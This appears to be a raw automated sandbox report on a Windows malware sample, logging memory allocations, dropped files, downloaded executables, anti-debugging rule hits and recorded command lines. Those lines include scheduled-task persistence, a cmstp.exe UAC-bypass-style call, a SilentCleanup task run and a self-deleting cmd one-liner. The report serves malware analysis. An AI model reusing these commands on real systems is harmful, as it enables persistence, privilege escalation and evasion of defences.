stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0038a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1684
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72142000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006dd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006de000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006df000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05bd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x720a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 260
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x720a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00780000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00392000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00790000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 3350459
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \\?\Volume{c2d901c4-0706-11e8-912e-806e6f6e6963}\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 13719306240
free_bytes_available: 13719306240
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open1.png.lnk
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\Public\Xypgtv\Xypgtv.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
file C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
file C:\Windows\Temp\m5smgpbx.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Roaming\pYVWAjXtpzU.exe
file C:\Users\Public\KDECO.bat
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
file C:\Users\Public\Trast.bat
file C:\Users\Public\UKO.bat
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\sqlite3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open1.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\sn.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\exit.png.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\readme.txt.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk
file C:\Users\test22\AppData\LocalLow\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\age.pyw.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\office_2007.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Python27.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.py.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Settings.ini.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.py.lnk
cmdline C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline "powershell" Get-MpPreference -verbose
cmdline /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline schtasks.exe /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
cmdline "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
cmdline cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcvb.exe"
file C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
file C:\Users\test22\AppData\Local\Temp\zxcvb.exe
file C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
file C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
file C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
file C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
file C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nss3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\sqlite3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll
file C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll
file C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll
file C:\Users\test22\AppData\Roaming\pYVWAjXtpzU.exe
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe
1 1 0

CreateProcessInternalW

 thread_identifier: 2920
thread_handle: 0x000007c0
process_identifier: 2712
current_directory:
filepath:
track: 1
command_line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcvb.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000007d0
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: schtasks.exe
parameters: /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
filepath: schtasks.exe
1 1 0

CreateProcessInternalW

 thread_identifier: 1824
thread_handle: 0x00000218
process_identifier: 1772
current_directory: C:\Users\test22\AppData\LocalLow
filepath:
track: 1
command_line: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\1vt3brkt.inf
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 1
process_handle: 0x0000021c
1 1 0

CreateProcessInternalW

 thread_identifier: 2608
thread_handle: 0x000000ac
process_identifier: 2520
current_directory:
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000b0
1 1 0

CreateProcessInternalW

 thread_identifier: 2600
thread_handle: 0x000001e8
process_identifier: 2624
current_directory: C:\Users\test22\AppData\LocalLow
filepath:
track: 1
command_line: "powershell" Get-MpPreference -verbose
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 1
process_handle: 0x00000208
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 77824
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x020f1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¢l$æ JOæ JOæ JOïuÙOê JO?oKNä JO?oINä JO?oONì JO?oNNí JOÄmKNä JO-nKNå JOæ KO~ JO-nNNò JO-nJNç JO-nµOç JO-nHNç JORichæ JOPEL¿bë[à"!  ¶b—¼ÐP ±@¨¸È0xÐ@`ÐþT(ÿ@Ðl.textË´¶ `.rdata DÐFº@@.data @À.rsrcx0@@.reloc`@@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELê˜=Sv? à! ÐàXà` 8à  °˜ÐL ü'ð¬Ñp.textÀÎÐ`0`.data°àÖ@@À.rdata$­ð®æ@@@.bss˜ €@À.edata˜°”@0@.idataL Ð ®@0À.CRTàº@0À.tls ð¼@0À.relocü'(¾@0B/4`0æ@@B/19È@è@B/35MPì@B/51`C`Dô@B/63„ °8@B/77” À F@B/89ÐR
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Àð/„‘AV„‘AV„‘AVéÒVˆ‘AV]ó@W†‘AV1†V…‘AV]óBW€‘AV]óDW‘AV]óEW‘AV¦ñ@W€‘AVOò@W‡‘AV„‘@V֑AVOòBW†‘AVOòEWÀ‘AVOòAW…‘AVOò¾V…‘AVOòCW…‘AVRich„‘AVPELØbë[à"!  Øf)Ýðp£s@pæPÀæÈ@xüÐPà0âTˆâ@ð8.texttÖØ `.rdataüþðÜ@@.data,HðÜ@À.rsrcx@à@@.relocàPä@B
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x000ea200', u'virtual_address': u'0x00002000', u'entropy': 7.817839234642155, u'name': u'.text', u'virtual_size': u'0x000ea160'} entropy 7.81783923464 description A section with a high entropy has been found
entropy 0.993633952255 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://ip-api.com/json
url https://dotbit.me/a/
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications use DNS rule Network_DNS
